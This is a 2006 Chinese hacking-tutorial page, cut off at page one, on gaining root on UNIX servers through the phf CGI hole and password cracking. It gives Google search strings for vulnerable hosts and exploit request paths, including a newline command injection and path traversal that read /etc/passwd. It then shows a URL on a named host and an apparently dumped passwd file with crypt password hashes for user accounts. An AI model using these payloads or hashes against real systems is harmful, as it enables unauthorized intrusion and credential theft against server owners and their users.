网站首页 | 网页制作 | 网络编程 | 图形图象 | 冲浪宝典 | 操作系统 | 软件教学 | 网络安全 | 认证考试 | 下载中心 | 游戏下载
| 网络安全首页 | 安全在线 | 病毒防治 | 黑客攻防 | 漏洞研究 | 黑客编程 | 破解手记 |
您现在的位置: 超人气学院 >> 网络安全 >> 黑客攻防 >> 文章正文 用户登录 新用户注册
UNIX主机的入侵           
UNIX主机的入侵
作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:18:47
今天我给大家带来的是UNIX系统的phf漏洞的攻击方法配合密码强攻来获取系统的最高权限。首先,我们连上Internet,打开红客的网络扫描器:www.google.com (随着google公司对这个搜索引擎的性能的不断提高,到现在可以说扫描一些远程URL漏洞是轻而易举,甚至连信用卡用户的资料都能扫描得到。),Q9750406我们用Google来搜索下列代码:
/cgi-bin/phf?Qalias=x%0aless%20/etc/passwd
/cgi-bin/phf.cgi?/etc/passwd
/cgi-bin/loadpage.cgi?user_id=1&file=/../../../../../../../../etc/passwd

刷的一下,几百个具备这个条件的资料被搜索出来了,真正有这个漏洞的网站并不多,呵呵,我居然找到了几个能用的:

http://www.hehe.com/cgi-bin/php.cgi?/etc/passwd


root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100

[1] [2] 下一页

[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda    责任编辑:kinda 
  • 上一篇文章:

  • 下一篇文章:
    • 【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
    专 题 栏 目
    最 新 热 门
     3389端口漏洞的入侵[3997]
     网吧管理软件破解版(美[3559]
     天空葵QQ密码探索者 b[1481]
     穿透局域网 内网远程控[1374]
     黑客是如何入侵网站的[1296]
     网络刺客二之使用指南[1086]
     最新奇迹私服复制漏洞[1014]
     入侵xp系统之初步攻略[959]
     回顾2001年中美黑客大[809]
     虚拟计算机 VMWare安装[798]
    相 关 文 章
    WinImage密码的另一种破解
    HowtounpackPEfilepackedb
    UNFOXALL2.1的注册机
    UNFOXALL2。0增强版注册机
    用SOFTICE破解AudioCompan
    爆破CHMUnpacker!!
    ollydbg的教学-Runtrace
    菜鸟破解录之AnimatedScre
    破解AudioCompanion1.14
    破解AudioCompanionv1.11
    BootStarv7.33keygeninpur
    用ollydbg快速破解UniView
    EffeTechHTTPSniffer3.2注
    脱掉QSoundQmp3DV1.0的vbo
    ShiznitScannerV2.1简单算
    网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!)
    联系QQ:80849